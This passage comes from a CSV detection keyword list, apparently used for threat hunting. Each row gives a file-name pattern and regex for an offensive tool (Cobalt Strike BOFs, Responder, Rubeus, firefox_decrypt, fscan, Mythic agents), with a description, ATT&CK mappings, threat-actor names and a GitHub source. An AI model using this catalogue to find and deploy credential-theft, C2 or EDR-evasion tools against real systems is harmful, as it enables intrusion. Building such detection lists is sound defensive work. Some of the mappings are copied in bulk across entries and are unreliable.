APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/fiesta2.profile*",".{0,1000}\/fiesta2\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/FileCrawlerMITM.py*",".{0,1000}\/FileCrawlerMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*/FilelessPELoader*",".{0,1000}\/FilelessPELoader.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" "*/File-Server.ps1*",".{0,1000}\/File\-Server\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*/final_shellcode_size.txt*",".{0,1000}\/final_shellcode_size\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","612","106","2024-01-02T20:56:41Z","2021-01-12T14:39:06Z" "*/find_domain.sh*",".{0,1000}\/find_domain\.sh.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*/find-computer.py*",".{0,1000}\/find\-computer\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/FindModule.c*",".{0,1000}\/FindModule\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/FindObjects-BOF","1","1","N/A","10","10","265","47","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z" "*/FindObjects.cna*",".{0,1000}\/FindObjects\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/FindObjects-BOF","1","1","N/A","10","10","265","47","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z" "*/FindSQLSrv.py*",".{0,1000}\/FindSQLSrv\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*/finger.nse*",".{0,1000}\/finger\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/fingerprint-strings.nse*",".{0,1000}\/fingerprint\-strings\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/firefox_decrypt.git*",".{0,1000}\/firefox_decrypt\.git.{0,1000}","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","10","10","1811","293","2024-04-07T20:04:37Z","2014-01-17T13:25:02Z" "*/firefox_decrypt.py*",".{0,1000}\/firefox_decrypt\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*/firewalk.nse*",".{0,1000}\/firewalk\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/firewall-bypass.nse*",".{0,1000}\/firewall\-bypass\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/flask:5000/supershell/*",".{0,1000}\/flask\:5000\/supershell\/.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","1275","159","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*/flatten-macho.m*",".{0,1000}\/flatten\-macho\.m.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/flume-master-info.nse*",".{0,1000}\/flume\-master\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Fodetect-hooksx64*",".{0,1000}\/Fodetect\-hooksx64.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","147","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" "*/follina.py*",".{0,1000}\/follina\.py.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","1","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z" "*/Forensike.git*",".{0,1000}\/Forensike\.git.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","1","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*/Forensike.ps1*",".{0,1000}\/Forensike\.ps1.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","1","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*/ForgeCert.exe*",".{0,1000}\/ForgeCert\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/ForgeCert.git*",".{0,1000}\/ForgeCert\.git.{0,1000}","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","1","N/A","10","6","589","96","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" "*/forkatz.filters*",".{0,1000}\/forkatz\.filters.{0,1000}","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","10","2","125","16","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" "*/forkatz.git*",".{0,1000}\/forkatz\.git.{0,1000}","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","10","2","125","16","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" "*/ForkDump.cpp*",".{0,1000}\/ForkDump\.cpp.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "*/ForkLib.cpp*",".{0,1000}\/ForkLib\.cpp.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "*/ForkPlayground.git*",".{0,1000}\/ForkPlayground\.git.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "*/format:hashcat*",".{0,1000}\/format\:hashcat.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*/forwardedemails.txt*",".{0,1000}\/forwardedemails\.txt.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*/FourEye.git*",".{0,1000}\/FourEye\.git.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","739","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*/fox-info.nse*",".{0,1000}\/fox\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/fox-it/BloodHound*",".{0,1000}\/fox\-it\/BloodHound.{0,1000}","offensive_tool_keyword","bloodhound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*/freelancer-info.nse*",".{0,1000}\/freelancer\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Freeze.rs*",".{0,1000}\/Freeze\.rs.{0,1000}","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","8","700","78","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" "*/freyja.go*",".{0,1000}\/freyja\.go.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*/freyja_tcp/*",".{0,1000}\/freyja_tcp\/.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*/fritzone/obfy*",".{0,1000}\/fritzone\/obfy.{0,1000}","offensive_tool_keyword","obfy","A tiny C++ obfuscation framework","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/fritzone/obfy","1","1","N/A","N/A","7","609","97","2020-06-10T13:28:32Z","2015-11-13T13:28:23Z" "*/fscan.exe*",".{0,1000}\/fscan\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*/fscan.git*",".{0,1000}\/fscan\.git.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*/fscan/releases/download/*",".{0,1000}\/fscan\/releases\/download\/.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*/fscan_freebsd_arm64*",".{0,1000}\/fscan_freebsd_arm64.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*/fscan_mac_arm64*",".{0,1000}\/fscan_mac_arm64.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*/fscan32 *",".{0,1000}\/fscan32\s.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*/fscan32.exe*",".{0,1000}\/fscan32\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*/fscan386 *",".{0,1000}\/fscan386\s.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*/fscan64.exe*",".{0,1000}\/fscan64\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*/fscanamd64 *",".{0,1000}\/fscanamd64\s.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*/fscanarm64.exe*",".{0,1000}\/fscanarm64\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*/fscanarmv6.exe*",".{0,1000}\/fscanarmv6\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*/fscanarmv7.exe*",".{0,1000}\/fscanarmv7\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*/ftp-anon.nse*",".{0,1000}\/ftp\-anon\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ftp-bounce.nse*",".{0,1000}\/ftp\-bounce\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ftp-brute.nse*",".{0,1000}\/ftp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/FtpC2/*",".{0,1000}\/FtpC2\/.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","1","N/A","10","10","81","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z" "*/ftp-libopie.nse*",".{0,1000}\/ftp\-libopie\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is 